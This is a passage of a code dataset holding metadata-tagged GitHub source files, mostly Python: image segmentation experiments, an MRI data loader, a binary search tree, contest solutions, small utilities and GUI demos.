FileReader:\n def __init__(self):\n pass\n\n def get(self, filepath, cookies=\"\"):\n \"\"\"\n Returns a binary string of the file contents, or None.\n \"\"\"\n # print(os.path.exists(filepath),filepath)\n if(os.path.exists(filepath)):\n if(os.path.isdir(filepath)):\n dir = f\"

{filepath}

\"\n return dir.encode(\"utf-8\")\n else:\n f = open(filepath, \"rb\")\n file = f.read()\n f.close()\n return file\n else:\n return None\n\n def head(self, filepath, cookies=\"\"):\n \"\"\"\n Returns the size to be returned, or None.\n \"\"\"\n\n if (os.path.exists(filepath)):\n if (os.path.isdir(filepath)):#size of dir, would be the html string\n return len(self.get(filepath))\n else:#otherwise its a file \n return os.path.getsize(filepath)\n\n return None","repo_name":"bdinh117/simple-http-fileserver","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39653084960","text":"import os.path\nimport sys\n\nimport cv2\nimport numpy as np\nimport pandas\nimport vigra\nimport segmfriends.io.zarr as zarr_utils\nimport nifty.graph.rag\nimport nifty.tools as ntools\n\nfrom segmUtils.io.export_images_from_zarr import export_images_from_zarr\nfrom segmUtils.preprocessing.preprocessing import convert_images_to_zarr_dataset, read_uint8_img, \\\n read_segmentation_from_file\nfrom segmfriends.io.images import write_segm_to_file\nfrom speedrun import process_speedrun_sys_argv\nfrom segmfriends.utils import check_dir_and_create\n\nfrom speedrun import BaseExperiment\nfrom segmfriends.utils.paths import get_vars_from_argv_and_pop\n\nfrom segmUtils.segmentation.cellpose.base_experiment import CellposeBaseExperiment\n\nfrom segmUtils.preprocessing import preprocessing as spacem_preproc\nfrom segmUtils.segmentation.cellpose import infer as cellpose_infer\nfrom segmUtils.postprocessing.convert_to_zarr import convert_segmentations_to_zarr, \\\n convert_multiple_cellpose_output_to_zarr\n\n\n\nclass MacrophagesExperiment(CellposeBaseExperiment):\n def compute_semantic_segm(self):\n # TODO: do it for every slice if too memory consuming...?\n zarr_path_predictions = self.zarr_path_predictions\n input_zarr_group_path = self.get(\"preprocessing/data_zarr_group\", ensure_exists=True)\n sem_segm_kwargs = self.get(\"compute_semantic_segm/compute_semantic_segm_kwargs\",\n ensure_exists=True)\n\n # Import raw data:\n mCherry_ch = zarr_utils.load_array_from_zarr_group(\n input_zarr_group_path,\n sem_segm_kwargs.get(\"red_channel_name\", \"mCherry\")\n )\n\n print(\"Computing semantic segmentation...\")\n for segm_data in sem_segm_kwargs.get(\"instance_segm_to_process\", []):\n GFP_segm = zarr_utils.load_array_from_zarr_group(\n zarr_path_predictions,\n segm_data[\"instance_segm_path\"]\n )\n GFP_segm, _, _ = vigra.analysis.relabelConsecutive(GFP_segm.astype(\"uint32\"))\n # Compute mCherry segmentation:\n mCherry_mask = mCherry_ch >= sem_segm_kwargs.get(\"red_ch_thresh\", 13)\n\n # # Get segmentation:\n # mCherry_segm = np.zeros_like(mCherry_mask, dtype=\"uint32\")\n # max_label = 0\n # for z in range(mCherry_mask.shape[0]):\n # mCherry_segm[z] = vigra.analysis.labelImage(mCherry_mask[z]) + max_label\n # max_label += mCherry_segm[z].max() + 1\n\n # TODO: check for nan values in the segmentation (and corner)\n rag = nifty.graph.rag.gridRag(GFP_segm.astype('uint32'))\n _, node_feat = nifty.graph.rag.accumulateMeanAndLength(rag, mCherry_mask.astype('float32'))\n # node_feat = nifty.graph.rag.accumulateNodeStandartFeatures(rag, mCherry_ch.astype('float32'), minVal=0., maxVal=255.)\n mean_mCherry_values = node_feat[:, [0]]\n assert np.isnan(mean_mCherry_values).sum() == 0, \"Something went wrong\"\n size_macrophages = node_feat[:, [1]]\n size_eaten_mCherry = mean_mCherry_values*size_macrophages\n # mean_mCherry_values[np.isnan(mean_mCherry_values)] = 0\n\n # Set segments with mCheery-mean > 2.0 as active:\n sem_mask = np.ones_like(mean_mCherry_values)\n sem_mask[size_eaten_mCherry >= sem_segm_kwargs.get(\"size_eaten_mCherry_thresh\", 10)] = 2.\n\n # mapped_feat = ntools.mapFeaturesToLabelArray(GFP_segm, mean_mCherry_values, ignore_label=0, fill_value=-1)[...,0]\n mapped_sem_segm = ntools.mapFeaturesToLabelArray(GFP_segm, sem_mask, ignore_label=0, fill_value=0)[\n ..., 0].astype(\n 'uint16')\n\n # Semantically label small cherry segments:\n mapped_sem_segm[np.logical_and(mCherry_mask, mapped_sem_segm == 0)] = 3\n\n # Delete small segments and get final segmentation:\n final_segm = np.where(GFP_segm == 0, mapped_sem_segm, GFP_segm + 5)\n max_label = 0\n for z in range(mapped_sem_segm.shape[0]):\n background_mask = final_segm[z] == 0\n final_segm[z] = vigra.analysis.labelImageWithBackground(final_segm[z].astype('uint32')) + max_label\n final_segm[z][background_mask] = 0 # TODO: not necessary anymore\n max_label += final_segm[z].max() + 1\n\n def get_size_map(label_image):\n node_sizes = np.bincount(label_image.flatten())\n return ntools.mapFeaturesToLabelArray(label_image, node_sizes[:, None], nb_threads=6).squeeze()\n\n size_map = get_size_map(final_segm)\n\n print(\"Size threshold: {}\".format(sem_segm_kwargs.get(\"size_threshold\", 25)))\n mask_small_segments = size_map < sem_segm_kwargs.get(\"size_threshold\", 25)\n mapped_sem_segm[mask_small_segments] = 0\n final_segm[mask_small_segments] = 0\n\n # Save segmentations to zarr file:\n zarr_utils.add_dataset_to_zarr_group(\n zarr_path_predictions,\n mapped_sem_segm,\n \"sem_segmentation\",\n add_array_dimensions=True\n )\n\n zarr_utils.add_dataset_to_zarr_group(\n zarr_path_predictions,\n final_segm,\n \"final_segmentation\",\n add_array_dimensions=True\n )\n\n print(\"Done processing semantic segmentations\")\n\n def export_results(self):\n \"\"\"\n For the moment this method is thought for inference. Generalize...?\n \"\"\"\n zarr_path_predictions = self.zarr_path_predictions\n input_zarr_group_path = self.get(\"preprocessing/data_zarr_group\", ensure_exists=True)\n export_images_from_zarr_kwargs = self.get(\"export_results/export_images_from_zarr_kwargs\", ensure_exists=True)\n csv_config_path = input_zarr_group_path.replace(\".zarr\", \".csv\")\n\n export_dir = os.path.join(self.experiment_directory, \"exported_results\")\n self.set(\"export_results/export_path\", export_dir)\n\n # Insert zarr path of the prediction file in the export parameters:\n assert \"datasets_to_export\" in export_images_from_zarr_kwargs\n datasets_to_export = export_images_from_zarr_kwargs.pop(\"datasets_to_export\")\n for idx in range(len(datasets_to_export)):\n datasets_to_export[idx][\"z_path\"] = zarr_path_predictions\n\n print(\"Exporting result images to original folder structure...\")\n\n\n # Export images in the original structure:\n export_images_from_zarr(export_dir,\n csv_config_path,\n datasets_to_export=datasets_to_export,\n delete_previous=True,\n **export_images_from_zarr_kwargs)\n\n def convert_sem_segm_to_csv(self):\n export_dir = os.path.join(self.experiment_directory, \"exported_results\")\n\n print(\"Converting semantic segmentation to csv format...\")\n df = convert_images_to_zarr_dataset(input_dir_path=export_dir,\n # ensure_all_channel_existance=True,\n rename_unique=False,\n extension=\".tif\",\n save_to_zarr=False,\n verbose=True,\n final_segm=\"_cell_segm\",\n sem_segm=\"_cell_type\"\n )\n\n for idx, image_data in df.iterrows():\n dir = image_data[\"Input dir\"]\n final_segm = read_segmentation_from_file(os.path.join(dir, image_data[\"final_segm\"]))\n sem_segm = read_segmentation_from_file(os.path.join(dir, image_data[\"sem_segm\"]))\n\n print(\"Max sem segmentation for {}: {}\".format(image_data[\"final_segm\"], sem_segm.max()))\n\n # Save semantic segmentation to csv:\n final_segm, _, _ = vigra.analysis.relabelConsecutive(final_segm.astype(\"uint32\"))\n\n rag = nifty.graph.rag.gridRag(final_segm.astype('uint32'))\n _, node_feat = nifty.graph.rag.accumulateMeanAndLength(rag, sem_segm.astype('float32'))\n node_semantic_segmentation = node_feat[:, 0].astype('uint32')\n\n # Write semantic data to csv:\n df = pandas.DataFrame({'cell_instance_ID': np.arange(1, node_semantic_segmentation.shape[0]),\n 'semantic_class': node_semantic_segmentation[1:]})\n df.to_csv(os.path.join(dir,image_data[\"sem_segm\"].replace(\".tif\", \".csv\")),index=False, sep=\";\")\n\n # Rewrite the new relabelled segmentation:\n write_segm_to_file(os.path.join(dir, image_data[\"final_segm\"]), final_segm)\n\n def test_enhance(self):\n in_dir = os.path.join(self.experiment_directory, \"cellpose_inputs/GFP_DAPI\")\n\n df = convert_images_to_zarr_dataset(input_dir_path=in_dir,\n rename_unique=False,\n extension=\".png\",\n save_to_zarr=False,\n verbose=True,\n cellpose_input=\"_0\",\n )\n\n from PIL import Image, ImageEnhance\n\n for idx, image_data in df.iterrows():\n dir = image_data[\"Input dir\"]\n cellpose_input = read_uint8_img(os.path.join(dir, image_data[\"cellpose_input\"]))\n pil_img = Image.fromarray(cellpose_input)\n enhancer = ImageEnhance.Brightness(pil_img)\n pil_img_out = enhancer.enhance(3)\n\n out_dir = os.path.join(dir, \"../bright\")\n check_dir_and_create(out_dir)\n pil_img_out.save(os.path.join(out_dir, image_data[\"cellpose_input\"]))\n # cv2.imwrite(os.path.join(out_dir, image_data[\"cellpose_input\"]), pil_img_out)\n break\n\n\n\nif __name__ == '__main__':\n source_path = os.path.dirname(os.path.realpath(__file__))\n sys.argv = process_speedrun_sys_argv(sys.argv, source_path, default_config_dir_path=\"./configs\",\n default_exp_dir_path=\"/scratch/bailoni/projects/cellpose_projects\")\n\n cls = MacrophagesExperiment\n cls().run()\n","repo_name":"abailoni/segmentation_spacem","sub_path":"experiments/veronika_proj/cellpose_infer.py","file_name":"cellpose_infer.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75136227785","text":"class Solution:\n def findNumOfValidWords(self, words: List[str], puzzles: List[str]) -> List[int]:\n #create bitmasks for all the words and put them in counter to group similar words\n #create bitmasks for each puzzle and check if any of its submasks matches word\n #TC = O(n*avg(n)+m*2^avg(m))\n def bitmask(word):\n #func to find the bitmask of a word\n count=0\n for letter in word:\n count|=1<<(ord(letter)-ord('a'))\n return count\n \n word_map=Counter(bitmask(word) for word in words) #create bitmask counter\n ans=list()\n \n #iterate over all the puzzles\n for puzzle in puzzles:\n first=1<<(ord(puzzle[0])-ord('a')) #get first letter of puzzle in bit form\n count=word_map[first] #add words that have the first letter only\n mask=bitmask(puzzle[1:]) #bitmask of the remaining letters of the puzzle\n submask=mask\n #iterate over all the submasks\n while submask:\n count+=word_map[first|submask]\n submask=(submask-1)&mask #iterates through all the possible submasks\n ans.append(count)\n \n return ans\n \n ","repo_name":"bamblebam/competitive-programming","sub_path":"2021/11_November_21/9-11-21/numberofvalidwordsinpuzzle.py","file_name":"numberofvalidwordsinpuzzle.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34542004440","text":"class No:\n def __init__(self, valor):\n self.valor = valor\n self.esquerda = None\n self.direita = None\n \n def mostra_no(self):\n print(self.valor)\n\n\nclass ArvoreBinariaBusca:\n def __init__(self):\n self.raiz = None\n self.ligacoes = []\n\n def inserir(self, valor):\n novo = No(valor)\n\n # se a árvore estiver vazia\n if self.raiz == None:\n self.raiz = novo\n else:\n atual = self.raiz\n\n while True:\n pai = atual\n\n if valor < atual.valor:\n atual = atual.esquerda\n if atual == None:\n pai.esquerda = novo\n self.ligacoes.append(f' {pai.valor} -> {novo.valor}')\n return\n else:\n atual = atual.direita\n if atual == None:\n pai.direita = novo\n self.ligacoes.append(f' {pai.valor} -> {novo.valor}')\n return\n\n def pesquisar(self, valor):\n atual = self.raiz\n\n while atual.valor != valor:\n if valor < atual.valor:\n atual = atual.esquerda\n else:\n atual = atual.direita\n if atual == None:\n return None\n\n return atual\n\n # Raiz, esquerda, direita\n def pre_ordem(self, no):\n if no != None:\n print(no.valor, end=' ')\n self.pre_ordem(no.esquerda)\n self.pre_ordem(no.direita)\n\n def em_ordem(self, no):\n if no != None:\n self.em_ordem(no.esquerda)\n print(no.valor, end=' ')\n self.em_ordem(no.direita)\n\n def pos_ordem(self, no):\n if no != None:\n self.pos_ordem(no.esquerda)\n self.pos_ordem(no.direita)\n print(no.valor, end=' ')\n\n def obter_sucessor(self, no):\n pai_sucessor = no\n sucessor = no\n atual = no.direita\n while atual != None:\n pai_sucessor = sucessor\n sucessor = atual\n atual = atual.esquerda\n if sucessor != no.direita:\n pai_sucessor.esquerda = sucessor.direita\n sucessor.direita = no.direita\n return sucessor\n\n def excluir(self, valor):\n if self.raiz == None:\n print('A árvore está vazia.')\n return\n \n atual = self.raiz\n pai = self.raiz\n e_esquerda = True\n while atual.valor != valor:\n pai = atual\n if valor < atual.valor:\n e_esquerda = True\n atual = atual.esquerda\n else:\n e_esquerda = False\n atual = atual.direita\n if atual == None:\n return False\n\n # Nó a ser apagado é uma folha\n if atual.esquerda == None and atual.direita == None:\n if atual == self.raiz:\n self.raiz = None\n elif e_esquerda:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n pai.esquerda = None\n else:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n pai.direita = None\n # Nó a ser apagado não possui filho a direita\n elif atual.direita == None:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.esquerda.valor}')\n if atual == self.raiz:\n self.raiz = atual.esquerda\n self.ligacoes.append(f' {self.raiz.valor} -> {atual.esquerda.valor}')\n elif e_esquerda == True:\n pai.esquerda = atual.esquerda\n self.ligacoes.append(f' {pai.valor} -> {atual.esquerda.valor}')\n else:\n pai.direita = atual.esquerda\n self.ligacoes.append(f' {pai.valor} -> {atual.esquerda.valor}')\n # Nó a ser apagado não possui filho a esquerda\n elif atual.esquerda == None:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.direita.valor}')\n if atual == self.raiz:\n self.raiz = atual.direita\n self.ligacoes.append(f' {self.raiz.valor} -> {atual.direita.valor}')\n elif e_esquerda == True:\n pai.esquerda = atual.direita\n self.ligacoes.append(f' {pai.valor} -> {atual.direita.valor}')\n else:\n pai.direita = atual.direita\n self.ligacoes.append(f' {pai.valor} -> {atual.direita.valor}')\n # Nó posssui dois filhos\n else:\n sucessor = self.obter_sucessor(atual)\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.direita.valor} -> {sucessor.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.esquerda.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.direita.valor}')\n\n if atual == self.raiz:\n self.raiz == sucessor\n self.ligacoes.append(f' {self.raiz.valor} -> {sucessor.valor}')\n elif e_esquerda == True:\n self.ligacoes.append(f' {pai.valor} -> {sucessor.valor}')\n pai.esquerda = sucessor\n else:\n self.ligacoes.append(f' {pai.valor} -> {sucessor.valor}')\n pai.direita = sucessor\n\n self.ligacoes.append(f' {sucessor.valor} -> {atual.esquerda.valor}')\n self.ligacoes.append(f' {sucessor.valor} -> {atual.direita.valor}')\n\n sucessor.esquerda = atual.esquerda\n return True\n\n\narvore = ArvoreBinariaBusca()\narvore.inserir(53)\narvore.inserir(30)\narvore.inserir(14)\narvore.inserir(39)\narvore.inserir(9)\narvore.inserir(23)\narvore.inserir(34)\narvore.inserir(49)\narvore.inserir(72)\narvore.inserir(61)\narvore.inserir(84)\narvore.inserir(79)\n\nprint(arvore.raiz.esquerda.valor)\nprint(arvore.raiz.direita.valor)\n\n# string para gerar a visualização com o GraphViz.\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n\nprint(arvore.pesquisar(39))\nprint(arvore.pesquisar(84))\nprint(arvore.pesquisar(100))\n\narvore.pre_ordem(arvore.raiz)\nprint('')\narvore.em_ordem(arvore.raiz)\nprint('')\narvore.pos_ordem(arvore.raiz)\n\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n\narvore.excluir(9)\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n\narvore.excluir(84)\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n","repo_name":"AlissonRaphael/algorithm_and_data_structures","sub_path":"23_arvore_binaria.py","file_name":"23_arvore_binaria.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17349950640","text":"import scipy\nfrom glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nfrom scipy.ndimage import zoom\nmin_voxel_value = 0\n#max_voxel_value = 5653.5\nmax_voxel_standard_value = 1024\nclass DataLoader(object):\n def __init__(self, img_h_res, img_l_res):\n self.h_img_res = img_h_res\n self.l_img_res = img_l_res\n self.resource_pool = {}\n self.loop_i = 1\n\n def get_res_low_from_origin(self, img_h, with_mask=False):\n lr = []\n mask = []\n lr_large = []\n data = np.copy(img_h)\n x_l = self.l_img_res[0]\n x_h = self.h_img_res[0]\n step = x_h//x_l\n start = 0\n plane0 = data[0]\n for i in range(x_l):\n if start < data.shape[0]:\n lr.append(data[start])\n if with_mask:\n lr_large.append(data[start])\n mask.append(np.zeros_like(plane0))\n start += step\n for j in range(step - 1):\n if with_mask:\n mask.append(np.ones_like(plane0))\n lr_large.append(np.zeros_like(plane0))\n lr = np.array(lr)\n if with_mask:\n if len(mask) > x_h:\n mask = mask[:x_h]\n if len(lr_large) > x_h:\n lr_large = lr_large[:x_h]\n mask = np.array(mask)\n lr_large = np.array(lr_large)\n return lr, mask, lr_large\n return lr\n\n def get_file_count(self, dataset_path):\n paths = glob(dataset_path, recursive=True)\n return len(paths)\n\n def load_data(self, dataset_path, batch_size=1, is_testing=False, with_mask=False):\n paths = glob(dataset_path, recursive=True)\n batch_images = np.random.choice(paths, size=batch_size)\n imgs_hr = []\n imgs_lr = []\n imgs_mask = []\n imgs_lr_large = []\n imgs_info = []\n imgs_path = []\n imgs_shape = []\n for path in batch_images:\n if path not in self.resource_pool:\n info, h_img = self.imread(path)\n # prevent run out of memory\n if (len(self.resource_pool) < 500):\n self.resource_pool[path] = (info, np.copy(h_img))\n else:\n info, h_img = self.resource_pool[path]\n h_img = np.copy(h_img)\n\n if is_testing:\n h_img = test_preprocessing(h_img)\n h_img = self.normalize(h_img)\n h_img_stand = h_img\n l_img_stand = h_img\n # TODO test mask\n mask = None\n l_img_large = None\n else:\n x_raw, y_raw, z_raw = h_img.shape\n x, y, z,_ = self.h_img_res\n h_img_stand = zoom(h_img, (x/x_raw, y/y_raw, z/z_raw))\n h_img_stand = self.normalize(h_img_stand)\n if with_mask:\n l_img_stand, mask, l_img_large = self.get_res_low_from_origin(h_img_stand, with_mask)\n else:\n l_img_stand = self.get_res_low_from_origin(h_img_stand, with_mask)\n '''\n i = self.loop_i\n t = mask[:i]\n mask = mask[i:]\n mask = np.append(mask, t, axis=0)\n\n t = l_img_large[:i]\n l_img_large = l_img_large[i:]\n l_img_large = np.append(l_img_large, t, axis=0)\n\n self.loop_i += 1\n if self.loop_i > x:\n self.loop_i = 1\n '''\n h_img_stand = np.expand_dims(h_img_stand, axis=-1)\n l_img_stand = np.expand_dims(l_img_stand, axis=-1)\n if with_mask:\n mask = np.expand_dims(mask, axis=-1)\n l_img_large = np.expand_dims(l_img_large, axis=-1)\n imgs_mask.append(mask)\n imgs_lr_large.append(l_img_large)\n imgs_hr.append(h_img_stand)\n imgs_lr.append(l_img_stand)\n imgs_info.append(info)\n imgs_shape.append(h_img.shape)\n imgs_path.append(path)\n\n imgs_hr = np.array(imgs_hr)\n imgs_lr = np.array(imgs_lr)\n if with_mask:\n imgs_mask = np.array(imgs_mask)\n imgs_lr_large = np.array(imgs_lr_large)\n return imgs_hr, imgs_lr, imgs_mask, imgs_lr_large, imgs_info, imgs_shape, imgs_path\n return imgs_hr, imgs_lr, imgs_info, imgs_shape, imgs_path\n\n def normalize(self, img):\n max_value = np.max(img)\n average = max_value/2.0\n return np.array(img) / float(average) - 1.\n\n def unnormalize(self, img, max_value=None):\n if max_value is None:\n max_value = max_voxel_standard_value\n average = max_value/2.0\n return (img + 1) * average\n\n def imread(self, path):\n mri_image = nib.load(path)\n mri_image_data = mri_image.get_fdata()\n return mri_image, mri_image_data\n\ndef test_preprocessing(X):\n x,y,z,_ = X.shape\n X = np.reshape(X, (x,y,z))\n X = np.rot90(X, 1, axes=(0,2))\n X = np.rot90(X, 2, axes=(1,2))\n return X\n\ndef show_slices(slices, title=''):\n fig, axes = plt.subplots(len(slices), 1, figsize=(16, 16))\n for i,slice in enumerate(slices):\n axes[i].imshow(slice.T, cmap=\"gray\", origin=\"lower\")\n axes[i].set_title(title)\n return fig\n\ndef clear_samples():\n import os\n os.system(\"rm sample_niis/*\")\n os.system(\"rm sample_images/*\")\n\n","repo_name":"qinwang-ai/Brain","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"701024250","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nclass SliderDemo(QWidget):\n def __init__(self,parent=None):\n super(SliderDemo, self).__init__(parent)\n #设置标题与初始大小\n self.setWindowTitle('QSlider例子')\n self.resize(300,100)\n\n #垂直布局\n layout=QVBoxLayout()\n\n #创建标签,居中\n self.l1=QLabel('Hello PyQt5')\n self.l1.setAlignment(Qt.AlignCenter)\n layout.addWidget(self.l1)\n #创建水平方向滑动条\n self.s1=QSlider(Qt.Horizontal)\n ##设置最小值\n self.s1.setMinimum(10)\n #设置最大值\n self.s1.setMaximum(50)\n #步长\n self.s1.setSingleStep(3)\n #设置当前值\n self.s1.setValue(20)\n #刻度位置,刻度下方\n self.s1.setTickPosition(QSlider.TicksBelow)\n #设置刻度间距\n self.s1.setTickInterval(5)\n layout.addWidget(self.s1)\n #设置连接信号槽函数\n self.s1.valueChanged.connect(self.valuechange)\n\n self.setLayout(layout)\n\n def valuechange(self):\n #输出当前地刻度值,利用刻度值来调节字体大小\n print('current slider value=%s'%self.s1.value())\n size=self.s1.value()\n self.l1.setFont(QFont('Arial',size))\n\nif __name__ == '__main__':\n app=QApplication(sys.argv)\n demo=SliderDemo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"yuting-demo-code/PyQt-code","sub_path":"slider bar.py","file_name":"slider bar.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27541569784","text":"\n# CCC 2018 J3 - Are We There Yet\n\n# Sample Input\n# 3 10 12 5\n\n# Sample Output\n# 0 3 13 25 30\n# 3 0 10 22 27\n# 13 10 0 12 17\n# 25 22 12 0 5\n# 30 27 17 5 0\n\n# Answer:\ndist = [3, 10, 12, 5]\n\nfor i in range(-1, 4):\n currentDist = 0\n output = []\n for j in range(i, -1, -1):\n currentDist += dist[j]\n output.insert(0, currentDist)\n\n output.append(0)\n\n currentDist = 0\n for j in range(i + 1, 4, 1):\n currentDist += dist[j]\n output.append(currentDist)\n\n for num in output:\n print(num, end=\" \")\n print()\n\n\n\n# ------------------------------------------------------------\n\n# CCC 2019 J3 - Cold Compress\n\n# Input\n# 4\n# +++===!!!!\n# 777777......TTTTTTTTTTTT\n# (AABBC)\n# 3.1415555\n\n# Output\n# 3 + 3 = 4 !\n# 6 7 6 . 12 T\n# 1 ( 2 A 2 B 1 C 1 )\n# 1 3 1 . 1 1 1 4 1 1 4 5\n\n# Approach 1: Using hard cord computing\n# n = int(input())\n# strings = []\n# for i in range(n):\n# strings.append(input())\n#\n# for line in strings:\n# prev = \"\"\n# output = \"\"\n# counter = 1\n# for letter in line:\n# if prev == \"\":\n# prev = letter\n# continue\n# if letter != prev:\n# output += str(counter) + \" \" + str(prev) + \" \"\n# counter = 1\n# else:\n# counter += 1\n# prev = letter\n# output += str(counter) + \" \" + str(prev) + \" \"\n# print(output)\n\n# Approach 2: Using dictionary to count\n\n# for i in range(int(input())):\n# chars = {}\n# for j in input():\n# if j not in chars:\n# chars[j] = 1;\n# else:\n# chars[j] += 1;\n# for (key, value) in chars.items():\n# print(value, end=\" \")\n# print(key, end=\" \")\n# print(\"\\n\")\n\n\n\n","repo_name":"KennyCheung-Dev/PythonClassContent","sub_path":"Python1Algo/python1-19/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72069387784","text":"from unittest.mock import MagicMock\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.urls import resolve\n\nfrom sockpuppet.consumer import SockpuppetConsumer\nfrom sockpuppet.reflex import Reflex\nfrom sockpuppet.element import Element\n\n\ndef reflex_factory(url, client, user=None, attributes={}, selectors=None, params={}):\n if not user:\n user = AnonymousUser()\n scope = {\"session\": client.session, \"user\": user}\n mock_consumer = MagicMock(scope=scope, spec=SockpuppetConsumer)\n element = Element(attributes)\n resolve(url) # work as an assert that url actually exists\n reflex = Reflex(\n consumer=mock_consumer,\n url=url,\n element=element,\n selectors=selectors,\n params=params,\n )\n return reflex\n","repo_name":"jonathan-s/django-sockpuppet","sub_path":"sockpuppet/test_utils/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":437,"dataset":"github-code","pt":"81"} +{"seq_id":"18163594947","text":"\r\n#Old Approach\r\ndef smallest_multiple(n):\r\n count=0\r\n for i in range(11,21):\r\n\r\n if n % i == 0:\r\n count+=1\r\n return count\r\n\r\n\r\nflag=True\r\nnumber=11\r\nwhile flag :\r\n\r\n divisors= smallest_multiple(number)\r\n print(\"The number of divisors for \" + str(number) + \" are: \" + str(divisors))\r\n if divisors>9:\r\n flag=False\r\n else:\r\n number+=11\r\n","repo_name":"Kangiryanka/ProjectEuler_problems","sub_path":"Project_Euler/smultiplev1.py","file_name":"smultiplev1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17980088610","text":"def main():\r\n print(\"\\n\\n\\n\\n######### Video Duration Calculator #########\")\r\n print(\" Press 'q' to get the final total.\\n\")\r\n total_seconds = 0\r\n\r\n def calculate_time(total_seconds):\r\n hours, remainder = divmod(total_seconds, 3600)\r\n minutes, seconds = divmod(remainder, 60)\r\n return f\"{hours:02d}:{minutes:02d}:{seconds:02d}\"\r\n\r\n while True:\r\n val_entered = input(\"Enter video duration (mm:ss): \")\r\n\r\n if val_entered == 'q':\r\n print(\"Generating total time...\")\r\n final_total = calculate_time(total_seconds)\r\n print(f\"Final video duration total: {final_total}\")\r\n break\r\n\r\n try:\r\n minutes, seconds = map(int, val_entered.split(\":\"))\r\n converted_seconds = minutes * 60 + seconds\r\n total_seconds += converted_seconds\r\n current_total = calculate_time(total_seconds)\r\n print(f\"Current total: {current_total}\")\r\n except ValueError:\r\n print(\"Invalid input. Please use the mm:ss format.\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"FahimIslam2410/Video-Duration-Calculator","sub_path":"VideoDurationCalculator.py","file_name":"VideoDurationCalculator.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8313285710","text":"\n\n# =========================================== md5 ========================================\nimport os\nimport hashlib\n\ndef get_md5(inputs, format_type=\"string\"):\n \"\"\"\n format_type: 'string' or 'file'\n \"\"\"\n\n data = \"null\"\n if format_type in [\"file\"]:\n if not os.path.isfile(inputs):\n return None\n\n with open(inputs, \"rb\") as fr:\n data = fr.read()\n elif format_type in [\"string\"]:\n data = inputs\n\n md5_value = hashlib.md5(data.encode(\"utf-8\")).hexdigest()\n\n return md5_value\n\n\ndef get_encoded_path(article_id, dirlen=2, dirnum=4, return_type='str'):\n md5_value = get_md5(article_id)\n folders = []\n s_i = 0\n for i in range(dirnum):\n if s_i + dirlen >= len(md5_value) or i==dirnum-1:\n folders.append(md5_value[s_i:])\n break\n else:\n folders.append(md5_value[s_i:s_i+dirlen])\n s_i += dirlen\n\n folder_path = os.path.join(*folders)\n if return_type=='str':\n return folder_path\n elif return_type=='list':\n return folders\n else:\n raise ValueError\n\n\n'''timeStamp to timeStr: 1479264792 to 2016-11-16 10:53:12'''\ndef timeStamp_To_timeStr(timeStamp):\n timeStruct = time.localtime(timeStamp)\n return time.strftime('%Y-%m-%d %H:%M:%S',timeStruct)\n\n\nif __name__ == '__main__':\n ID = 'S1500000SO01DG1SVEFT0MH'\n ID = 'S0900000000000004770110'\n ID = 'S33000003xekxqm28frufpm'\n folder_list = get_encoded_path(ID, return_type='list') \n print('#### ID, folder_list', ID, folder_list) \n\n","repo_name":"songxia928/utils_cv","sub_path":"script/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9709228929","text":"import argparse\nimport re\nfrom pathlib import Path\nfrom typing import Callable, Dict, List, Optional, Sequence\n\nimport libcst as cst\n\nKEY_PATTERN = re.compile(r'^(\\\"|\\')(?P.*)(\\\"|\\')$')\nEXIT_CODE_NO_CHANGES = 